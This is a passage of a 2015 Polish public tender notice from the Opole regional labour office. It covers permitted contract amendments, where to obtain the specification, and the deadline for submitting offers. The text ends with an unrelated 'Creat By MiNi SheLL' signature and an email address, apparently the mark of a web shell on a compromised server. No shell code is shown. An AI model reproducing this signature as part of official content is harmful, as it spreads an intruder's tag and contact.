1)	zmianę realizacji terminu wyjazdu - w przypadku przedłużającej się procedury przetargowej uniemożliwiającej zrealizowanie całej usługi w terminie wskazanym w §2 ust. 2 wzoru umowy lub wystąpienia innych przyczyny związanych z realizacją projektu Wsparcie kompetencji na starcie,
2)	zmianę poszczególnych elementów programu określonych w § 8 wzoru umowy w tym w szczególności zmianę kolejności i liczbę noclegu w poszczególnych miejscowościach, zmianę kolejności i długości spotkań w poszczególnych instytucjach - w przypadku wystąpienia okoliczności związanych z realizacją projektu Wsparcie kompetencji na starcie,
3)	zmianę ilości osób biorących udział w wyjeździe - w przypadku wystąpienia okoliczności związanych z realizacją projektu Wsparcie kompetencji na starcie,
4)	zmianę stawki podatku VAT w przypadku zmiany przepisów obowiązujących w tym zakresie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wup.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25c, pok. nr 6, parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2015 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25c, pok. nr 10 - kancelaria , parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny, Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com